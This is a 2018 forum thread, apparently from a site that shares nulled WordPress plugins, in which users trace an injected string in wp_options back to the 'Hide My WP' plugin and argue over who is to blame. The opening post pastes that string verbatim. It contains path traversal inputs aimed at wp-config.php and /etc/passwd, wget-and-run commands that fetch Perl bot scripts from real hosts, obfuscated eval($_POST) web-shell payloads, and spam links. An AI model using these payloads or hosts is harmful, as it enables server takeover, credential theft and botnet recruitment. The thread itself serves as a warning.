Read this If you have installed Hide My WP Untouched

***CreativeMedia*** · 01-12-2018, 03:53 AM

Hi all,

I recently download (Hide My WP Untouched) here and installed then I found some code on my database 'wp_options' :

PHP Code:

s:2530:"file=../../../../../../wp-config.php,file=../../../../../wp-config.php,file=../../wp-config.php,file=/path/wp-config.php,path=../../, _mysite_download_skin=../../../../../wp-config.php, fileName=../../../../../../../../../../etc/passwd, files=../../../../wp-config.php,file=../wp-config.php, img=../wp-config.php,screen_id=plugin-editor, pwd=!@#,pwd=$#,download=../../../wp-config.php, var=../../../wp-config.php,download_file=../../../wp-config.php, path=../../../../../../../wp-config.php, f=../../../../wp-config.php,filename=../../../../wp-config.php,video=../wp-config.php, href=../../../../wp-config.php, file=file:///var/www/wp-config.php, file=../../../wp-config.php,imgurl=../../../../wp-config.php, imgname=../../../wp-config.php, src=../../../../wp-config.php, data=../../../../wp-config.php, img=../../.my.cnf, download_backup_file=../wp-config.php, gform_unique_id=../../../../../,cmd=wget http://shunceng.altervista.org/irc//dos.txt ;lwp-download http://shunceng.altervista.org/irc//dos.txt ; perl dos.txt ; perl dos.txt ; perl dos.txt ; perl dos.txt ; perl ddos.txt ; rm -rf dos.*, shxxx=cd /tmp;wget http://chel.bit-ecol.ru/wp-includes/ID3/robots;perl robots;perl robots;perl robots;perl robots;perl robots;rm -rf robo*,cmd=wget http://suryaselindo.co.id//plugins/content/multithumb/stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; rm -rf stats*,form_id=../../, upload-dir=./../../,z=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));,message=d <a href="http://cialis24h.party/#8746">buy cialis online safely</a> buy cialis online uk, #=eval("echo 10000000000-245205634;");, x=../../wp-config.php, mdocs-img-preview=../../..-/wp-config.php, data=../../..-/wp-config.php,coco=@eval(base64_decode($_POST[z0]));,filename=../../../../../../../../../etc/passwd,q071238=echo '%%%' . 'q071238' . '%%%';, calendar_id=../../../../wp-config.php,id=../../../../../../wp-config.php, src=http://free-games.top/tmp/db.php,q=/wp-config.php~,coco=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));,coco=@, coco=eval(urldecode(urldecode($_POST[chr(99).chr(111).chr(100).chr(101).chr(122)])));, z=@eval/**/(${\'_P\'.\'OST\'}[z9]/**/(${\'_POS\'.\'T\'}[z0]));, gform_unique_id=../../../, file=/path/wp-config.php, bot=eval("echo 10000000000-245205634;");, uploader_dir=./UmpSiX, uploader_dir=DbtXLd, uploader_dir=./ADLAyD, uploader_dir=./DVwEgu, uploader_dir=./gWAlvS, file_path=../../../../wp-config.php,bot=eval("echo 10000000000-245205634;");, fname=../../wp-config.php, chdir=./";} 

Try to check your website database by searching for: trust_network_rules or pp_important_messages and see if you can find this crappy code inside..

Untouched my A.S.S :(

If someone know what this code do please do add a reply.

***MajoMaslo*** · 01-12-2018, 04:47 AM

It's easy... You can read everything from that code...
This script is placing ads on your website and "hacker" can use your server as a botnet...
If this is from untouched version from this forum @Chupach need to be banned... I will take a look at his version...

***bale*** · 01-12-2018, 06:00 AM

How do you know it was Hide My WP Untouched. It could be a million other reasons for the injection. Check you logs!

***CreativeMedia*** · 01-12-2018, 06:38 AM

(01-12-2018 06:00 AM)bale Wrote: How do you know it was Hide My WP Untouched. It could be a million other reasons for the injection. Check you logs!

I am 100% sure this plugin is infected, I installed 3 times and every time I found this code add to my database..

Please try to install and save the setting first then go to your database and search searching for:

Code:

trust_network_rules 

pp_important_messages

The code is inside these files.

***b1tr0t*** · (This post was last modified: 01-12-2018 06:43 AM by b1tr0t.)

Yep. Even if it says untouched, you can't trust it.

Unless I absolutely know for sure, such as a group buy, I don't use plugins from forums on production sites. I will install them on a sandbox site, then evaluate for purchase.

Just not worth the risk.

***CreativeMedia*** · 01-12-2018, 07:10 AM

Now I installed the 4 time with a clean WordPress installation and this plugin!! WOW!! Beware Guys This Is Infected Plugin and I will check the other plugins shared by "Chupach" if the have the similar tricks

***bale*** · 01-12-2018, 03:07 PM

You are right. I did a fresh wp install and it does create that crap. Now I'm not sure if there's something injected in the actual script or its coming from their server. I will compare to other versions I have from different sources. Maybe someone has a purchased version and can help out.

***Chupach*** · (This post was last modified: 01-12-2018 05:17 PM by Chupach.)

Hi everyone,

Someone mentioned me here :) First of all, I'm sorry if this make you confused. I swear I didn't that. I also give you the purchase code and latest version of Hide My WP plugin (5.5.5) to verify it. PM me if you need that. And you also check my other shares on forum such as Yoast SEO, WP-Rocket, Newspaper etc... If you figure out the same snippet code above in these stuffs, I will agree to my account's blocked.

Thanks

I have account on Hide My WP website support which need purchased code to registation: https://imgur.com/OnasEtg

***bale*** · 01-12-2018, 05:27 PM

I can confirm that a purchased copy does the same. So Chupach has no blame here. Its something at their end. Maybe this call http://api.wpwave.com/important_message.php

***Chupach*** · 01-12-2018, 05:37 PM

(01-12-2018 05:27 PM)bale Wrote: I can confirm that a purchased copy does the same. So Chupach has no blame here. Its something at their end. Maybe this call http://api.wpwave.com/important_message.php

Thanks for your explaint. I will report this to Envato.